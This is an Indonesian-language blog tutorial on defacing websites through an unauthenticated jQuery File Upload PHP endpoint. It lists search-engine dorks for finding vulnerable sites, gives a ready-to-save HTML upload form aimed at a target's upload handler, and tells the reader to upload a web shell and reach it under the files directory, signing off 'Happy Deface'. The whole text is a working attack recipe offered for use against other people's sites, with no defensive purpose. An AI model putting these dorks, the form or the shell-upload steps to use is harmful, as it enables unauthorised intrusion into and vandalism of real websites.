Tutorial Deface Dengan JQuery File Upload Vulnerability

Kali ini saya akan membagikan teknik deface dengan Metode Jquery File Upload teknik ini sangat mudah di pelajari langsung aja ke TKP.

Dork : /assets/global/plugins/jquery-file-upload/

inurl:"assets/global/plugins/jquery-file-upload/"

intext:"assets/global/plugins/jquery-file-upload/"

inurl:"/assets/global/plugins/jquery-file-upload/server/php/files/"

(sisanya kembangin sendiri)

Exploit : http://target/assets/global/plugins/jquery-file-upload/server/php/

Jika Vuln maka tampilannya sama seperti "FormCraft"

Copy script CSRF nya di bawah.

<form method="POST" action="http://www.target.com/assets/global/plugins/jquery-file-upload/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

Jika sudah di save, silahkan buka filenya dengan browser yang anda gunakan lalu upload shellnya.

Jika upload berhasil maka akan tampil nama shell anda, jika nama shell anda tidak tampil saya sarankan cari target lain

Shell Access : target.com/assets/global/plugins/jquery-file-upload/server/php/files/namashell.php

Happy Deface :)

Bagikan Artikel ini